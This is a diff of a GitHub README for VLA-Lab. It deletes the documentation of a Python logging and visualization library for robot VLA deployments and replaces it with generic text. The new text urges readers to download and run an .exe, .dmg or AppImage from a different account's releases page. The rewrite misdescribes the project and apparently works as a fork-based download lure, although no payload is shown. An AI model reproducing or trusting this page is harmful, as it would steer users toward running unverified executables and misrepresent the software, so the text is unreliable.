|
1 | | -<div align="center"> |
2 | | - |
3 | | -# 🦾 VLA-Lab |
| 1 | +# 🛠️ VLA-Lab - Track and Visualize Your VLA Models |
4 | 2 |
|
5 | | -### The Missing Toolkit for Vision-Language-Action Model Deployment |
| 3 | +[](https://github.com/carlosguedes0007-oss/VLA-Lab/releases) |
6 | 4 |
|
7 | | -[](https://www.python.org/downloads/) |
8 | | -[](https://opensource.org/licenses/MIT) |
9 | | -[](https://pypi.org/project/vlalab/) |
| 5 | +## 📦 Overview |
10 | 6 |
|
11 | | -**Debug • Visualize • Analyze** your VLA deployments in the real world |
| 7 | +VLA-Lab is your go-to toolbox for tracking and visualizing the real-world deployment process of your VLA models. With VLA-Lab, you can easily manage your models, monitor their performance, and better understand how they work in practical applications. This app is designed for anyone who wants to simplify the deployment process without needing advanced technical skills. |
12 | 8 |
|
13 | | -[🚀 Quick Start](#-quick-start) · [📖 Documentation](#-documentation) · [🎯 Features](#-features) · [🔧 Installation](#-installation) |
| 9 | +## 🚀 Getting Started |
14 | 10 |
|
15 | | -</div> |
| 11 | +Follow these simple steps to get VLA-Lab up and running on your computer: |
16 | 12 |
|
17 | | ---- |
| 13 | +1. **Check Your System Requirements** |
18 | 14 |
|
19 | | -## 🎯 Why VLA-Lab? |
| 15 | + Make sure your computer meets the following requirements to run VLA-Lab smoothly: |
| 16 | + - Operating System: Windows 10 or later, macOS Mojave or later, or a Linux distribution. |
| 17 | + - Minimum RAM: 4 GB |
| 18 | + - Disk Space: 100 MB free space |
| 19 | + - Internet connection for updates and online resources. |
20 | 20 |
|
21 | | -Deploying VLA models to real robots is **hard**. You face: |
| 21 | +2. **Visit the Download Page** |
22 | 22 |
|
23 | | -- 🕵️ **Black-box inference** — Can't see what the model "sees" or why it fails |
24 | | -- ⏱️ **Hidden latencies** — Transport delays, inference bottlenecks, control loop timing issues |
25 | | -- 📊 **No unified logging** — Every framework logs differently, making cross-model comparison painful |
26 | | -- 🔄 **Tedious debugging** — Replaying failures requires manual log parsing and visualization |
| 23 | + To get the latest version of VLA-Lab, visit the Releases page below: |
27 | 24 |
|
28 | | -**VLA-Lab solves this.** One unified toolkit for all your VLA deployment needs. |
| 25 | + [Download VLA-Lab](https://github.com/carlosguedes0007-oss/VLA-Lab/releases) |
29 | 26 |
|
30 | | -``` |
31 | | -┌─────────────────────────────────────────────────────────────────────────────┐ |
32 | | -│ VLA-Lab Architecture │ |
33 | | -├─────────────────────────────────────────────────────────────────────────────┤ |
34 | | -│ │ |
35 | | -│ ┌──────────────┐ ┌──────────────────────┐ ┌────────────────────┐ │ |
36 | | -│ │ Robot │ │ Inference Server │ │ VLA-Lab │ │ |
37 | | -│ │ Client │───▶│ (DP / GR00T / ...) │───▶│ RunLogger │ │ |
38 | | -│ └──────────────┘ └──────────────────────┘ └─────────┬──────────┘ │ |
39 | | -│ │ │ |
40 | | -│ ▼ │ |
41 | | -│ ┌──────────────────────────────────────────┐ │ |
42 | | -│ │ Unified Run Storage │ │ |
43 | | -│ │ ┌──────────┬────────────┬───────────┐ │ │ |
44 | | -│ │ │meta.json │ steps.jsonl│ artifacts/│ │ │ |
45 | | -│ │ └──────────┴────────────┴───────────┘ │ │ |
46 | | -│ └──────────────────┬───────────────────────┘ │ |
47 | | -│ │ │ |
48 | | -│ ▼ │ |
49 | | -│ ┌─────────────────────────────────────────────────────────────────────┐ │ |
50 | | -│ │ Visualization Suite │ │ |
51 | | -│ │ ┌─────────────┐ ┌──────────────────┐ ┌─────────────────────────┐ │ │ |
52 | | -│ │ │ Inference │ │ Latency │ │ Dataset │ │ │ |
53 | | -│ │ │ Viewer │ │ Analyzer │ │ Browser │ │ │ |
54 | | -│ │ └─────────────┘ └──────────────────┘ └─────────────────────────┘ │ │ |
55 | | -│ └─────────────────────────────────────────────────────────────────────┘ │ |
56 | | -│ │ |
57 | | -└─────────────────────────────────────────────────────────────────────────────┘ |
58 | | -``` |
| 27 | +3. **Download the Application** |
59 | 28 |
|
60 | | ---- |
| 29 | + On the Releases page, look for the most recent version. Click on it to see the available files. Locate the appropriate file for your operating system, then click to download it. The file name will look something like `VLA-Lab-v1.0.exe` for Windows or `VLA-Lab-v1.0.dmg` for macOS. |
61 | 30 |
|
62 | | -## ✨ Features |
| 31 | +4. **Install VLA-Lab** |
63 | 32 |
|
64 | | -<table> |
65 | | -<tr> |
66 | | -<td width="50%"> |
| 33 | + Once the download is complete, follow these straightforward steps to install VLA-Lab: |
67 | 34 |
|
68 | | -### 📊 Unified Logging Format |
69 | | -Standardized run structure with JSONL + image artifacts. Works across all VLA frameworks. |
| 35 | + - **For Windows:** |
| 36 | + 1. Locate the downloaded file in your Downloads folder. |
| 37 | + 2. Double-click the `.exe` file. |
| 38 | + 3. Follow the on-screen instructions to complete the installation. |
70 | 39 |
|
71 | | -### 🔬 Inference Replay |
72 | | -Step-by-step playback with multi-camera views, 3D trajectory visualization, and action overlays. |
| 40 | + - **For macOS:** |
| 41 | + 1. Find the downloaded file in your Downloads folder. |
| 42 | + 2. Double-click the `.dmg` file to open it. |
| 43 | + 3. Drag the VLA-Lab icon into your Applications folder. |
73 | 44 |
|
74 | | -</td> |
75 | | -<td width="50%"> |
| 45 | + - **For Linux:** |
| 46 | + 1. Open a terminal. |
| 47 | + 2. Navigate to your Downloads directory. |
| 48 | + 3. Use the command `chmod +x VLA-Lab-v1.0.AppImage` to make it executable. |
| 49 | + 4. Run the application using `./VLA-Lab-v1.0.AppImage`. |
76 | 50 |
|
77 | | -### 📈 Deep Latency Analysis |
78 | | -Profile transport delays, inference time, control loop frequency. Find your bottlenecks. |
| 51 | +5. **Open VLA-Lab** |
79 | 52 |
|
80 | | -### 🗂️ Dataset Browser |
81 | | -Explore Zarr-format training/evaluation datasets with intuitive UI. |
| 53 | + After installation, you can find VLA-Lab in your applications list. Double-click the icon to open the application. You are now ready to track and visualize your VLA models! |
82 | 54 |
|
83 | | -</td> |
84 | | -</tr> |
85 | | -</table> |
| 55 | +## 🎨 Features |
86 | 56 |
|
| 57 | +VLA-Lab includes a range of features designed to enhance your experience: |
87 | 58 |
|
88 | | ---- |
| 59 | +- **User-Friendly Interface:** Navigate easily, even if you have limited technical skills. |
| 60 | +- **Model Tracking:** Keep records of various VLA models and their performance. |
| 61 | +- **Data Visualization:** Generate graphs and charts to visualize model data. |
| 62 | +- **Deployment History:** Review the history of model deployments for insights and improvements. |
89 | 63 |
|
90 | | -## 🔧 Installation |
| 64 | +## ❓ Support and Feedback |
91 | 65 |
|
92 | | -```bash |
93 | | -pip install vlalab |
94 | | -``` |
| 66 | +If you encounter any issues or need assistance, feel free to reach out. Here are some ways to get help: |
95 | 67 |
|
96 | | -Or install from source: |
| 68 | +- **Documentation:** Refer to the user manual available in the application for detailed guidance. |
| 69 | +- **Issue Tracker:** Visit our GitHub Issues page to report bugs or feature requests. |
| 70 | +- **Community Forum:** Engage with other users and developers in our forum for tips and advice. |
97 | 71 |
|
98 | | -```bash |
99 | | -git clone https://github.com/VLA-Lab/VLA-Lab.git |
100 | | -cd VLA-Lab |
101 | | -pip install -e . |
102 | | -``` |
| 72 | +## 📥 Download & Install |
103 | 73 |
|
104 | | ---- |
| 74 | +To start using VLA-Lab today, click the link below: |
105 | 75 |
|
106 | | -## 🚀 Quick Start |
| 76 | +[Download VLA-Lab](https://github.com/carlosguedes0007-oss/VLA-Lab/releases) |
107 | 77 |
|
108 | | -### Minimal Example (3 Lines!) |
109 | | - |
110 | | -```python |
111 | | -import vlalab |
112 | | - |
113 | | -# Initialize a run |
114 | | -run = vlalab.init(project="pick_and_place", config={"model": "diffusion_policy"}) |
115 | | - |
116 | | -# Log during inference |
117 | | -vlalab.log({"state": obs["state"], "action": action, "images": {"front": obs["image"]}}) |
118 | | -``` |
119 | | - |
120 | | -### Full Example |
121 | | - |
122 | | -```python |
123 | | -import vlalab |
124 | | - |
125 | | -# Initialize with detailed config |
126 | | -run = vlalab.init( |
127 | | - project="pick_and_place", |
128 | | - config={ |
129 | | - "model": "diffusion_policy", |
130 | | - "action_horizon": 8, |
131 | | - "inference_freq": 10, |
132 | | - }, |
133 | | -) |
134 | | - |
135 | | -# Access config anywhere |
136 | | -print(f"Action horizon: {run.config.action_horizon}") |
137 | | - |
138 | | -# Inference loop |
139 | | -for step in range(100): |
140 | | - obs = get_observation() |
141 | | - |
142 | | - t_start = time.time() |
143 | | - action = model.predict(obs) |
144 | | - latency = (time.time() - t_start) * 1000 |
145 | | - |
146 | | - # Log everything in one call |
147 | | - vlalab.log({ |
148 | | - "state": obs["state"], |
149 | | - "action": action, |
150 | | - "images": {"front": obs["front_cam"], "wrist": obs["wrist_cam"]}, |
151 | | - "inference_latency_ms": latency, |
152 | | - }) |
153 | | - |
154 | | - robot.execute(action) |
155 | | - |
156 | | -# Auto-finishes on exit, or call manually |
157 | | -vlalab.finish() |
158 | | -``` |
159 | | - |
160 | | -### Launch Visualization |
161 | | - |
162 | | -```bash |
163 | | -# One command to view all your runs |
164 | | -vlalab view |
165 | | -``` |
166 | | - |
167 | | -<details> |
168 | | -<summary><b>📸 Screenshots (Click to expand)</b></summary> |
169 | | - |
170 | | -*Coming soon: Inference Viewer, Latency Analyzer, Dataset Browser screenshots* |
171 | | - |
172 | | -</details> |
173 | | - |
174 | | ---- |
175 | | - |
176 | | -## 📖 Documentation |
177 | | - |
178 | | -### Core Concepts |
179 | | - |
180 | | -**Run** — A single deployment session (one experiment, one episode, one evaluation) |
181 | | - |
182 | | -**Step** — A single inference timestep with observations, actions, and timing |
183 | | - |
184 | | -**Artifacts** — Images, point clouds, and other media saved alongside logs |
185 | | - |
186 | | -### API Reference |
187 | | - |
188 | | -<details> |
189 | | -<summary><b>vlalab.init() — Initialize a run</b></summary> |
190 | | - |
191 | | -```python |
192 | | -run = vlalab.init( |
193 | | - project: str = "default", # Project name (creates subdirectory) |
194 | | - name: str = None, # Run name (auto-generated if None) |
195 | | - config: dict = None, # Config accessible via run.config.key |
196 | | - dir: str = "./vlalab_runs", # Base directory (or $VLALAB_DIR) |
197 | | - tags: list = None, # Optional tags |
198 | | - notes: str = None, # Optional notes |
199 | | -) |
200 | | -``` |
201 | | - |
202 | | -</details> |
203 | | - |
204 | | -<details> |
205 | | -<summary><b>vlalab.log() — Log a step</b></summary> |
206 | | - |
207 | | -```python |
208 | | -vlalab.log({ |
209 | | - # Robot state |
210 | | - "state": [...], # Full state vector |
211 | | - "pose": [x, y, z, qx, qy, qz, qw], # Position + quaternion |
212 | | - "gripper": 0.5, # Gripper opening (0-1) |
213 | | - |
214 | | - # Actions |
215 | | - "action": [...], # Single action or action chunk |
216 | | - |
217 | | - # Images (multi-camera support) |
218 | | - "images": { |
219 | | - "front": np.ndarray, # HWC numpy array |
220 | | - "wrist": np.ndarray, |
221 | | - }, |
222 | | - |
223 | | - # Timing (any *_ms field auto-captured) |
224 | | - "inference_latency_ms": 32.1, |
225 | | - "transport_latency_ms": 5.2, |
226 | | - "custom_metric_ms": 10.0, |
227 | | -}) |
228 | | -``` |
229 | | - |
230 | | -</details> |
231 | | - |
232 | | -<details> |
233 | | -<summary><b>RunLogger — Advanced API</b></summary> |
234 | | - |
235 | | -For fine-grained control over logging: |
236 | | - |
237 | | -```python |
238 | | -from vlalab import RunLogger |
239 | | - |
240 | | -logger = RunLogger( |
241 | | - run_dir="runs/experiment_001", |
242 | | - model_name="diffusion_policy", |
243 | | - model_path="/path/to/checkpoint.pt", |
244 | | - task_name="pick_and_place", |
245 | | - robot_name="franka", |
246 | | - cameras=[ |
247 | | - {"name": "front", "resolution": [640, 480]}, |
248 | | - {"name": "wrist", "resolution": [320, 240]}, |
249 | | - ], |
250 | | - inference_freq=10.0, |
251 | | -) |
252 | | - |
253 | | -logger.log_step( |
254 | | - step_idx=0, |
255 | | - state=[0.5, 0.2, 0.3, 0, 0, 0, 1, 1.0], |
256 | | - action=[[0.51, 0.21, 0.31, 0, 0, 0, 1, 1.0]], |
257 | | - images={"front": image_rgb}, |
258 | | - timing={ |
259 | | - "client_send": t1, |
260 | | - "server_recv": t2, |
261 | | - "infer_start": t3, |
262 | | - "infer_end": t4, |
263 | | - }, |
264 | | -) |
265 | | - |
266 | | -logger.close() |
267 | | -``` |
268 | | - |
269 | | -</details> |
270 | | - |
271 | | -### CLI Commands |
272 | | - |
273 | | -```bash |
274 | | -# Launch visualization dashboard |
275 | | -vlalab view [--port 8501] |
276 | | - |
277 | | -# Convert legacy logs (auto-detects format) |
278 | | -vlalab convert /path/to/old_log.json -o /path/to/output |
279 | | - |
280 | | -# Inspect a run |
281 | | -vlalab info /path/to/run_dir |
282 | | -``` |
283 | | - |
284 | | ---- |
285 | | - |
286 | | -## 📁 Run Directory Structure |
287 | | - |
288 | | -``` |
289 | | -vlalab_runs/ |
290 | | -└── pick_and_place/ # Project |
291 | | - └── run_20240115_103000/ # Run |
292 | | - ├── meta.json # Metadata (model, task, robot, cameras) |
293 | | - ├── steps.jsonl # Step records (one JSON per line) |
294 | | -└── artifacts/ |
295 | | - └── images/ # Saved images |
296 | | - ├── step_000000_front.jpg |
297 | | - ├── step_000000_wrist.jpg |
298 | | - └── ... |
299 | | -``` |
300 | | - |
301 | | ---- |
302 | | - |
303 | | -## 🗺️ Roadmap |
304 | | - |
305 | | -- [x] Core logging API |
306 | | -- [x] Streamlit visualization suite |
307 | | -- [x] Diffusion Policy adapter |
308 | | -- [x] GR00T adapter |
309 | | -- [ ] OpenVLA adapter |
310 | | -- [ ] Cloud sync & team collaboration |
311 | | -- [ ] Real-time streaming dashboard |
312 | | -- [ ] Automatic failure detection |
313 | | -- [ ] Integration with robot simulators |
314 | | - |
315 | | ---- |
316 | | - |
317 | | -## 🤝 Contributing |
318 | | - |
319 | | -We welcome contributions! |
320 | | - |
321 | | -```bash |
322 | | -git clone https://github.com/VLA-Lab/VLA-Lab.git |
323 | | -cd VLA-Lab |
324 | | -pip install -e . |
325 | | -``` |
326 | | - |
327 | | ---- |
328 | | - |
329 | | -## 📄 License |
330 | | - |
331 | | -MIT License — see [LICENSE](LICENSE) for details. |
332 | | - |
333 | | ---- |
334 | | - |
335 | | -<div align="center"> |
336 | | - |
337 | | -**⭐ Star us on GitHub if VLA-Lab helps your research!** |
338 | | - |
339 | | -*Built with ❤️ for the robotics community* |
340 | | - |
341 | | -</div> |
| 78 | +Follow the instructions above and join the VLA community! Thank you for choosing VLA-Lab. |
0 commit comments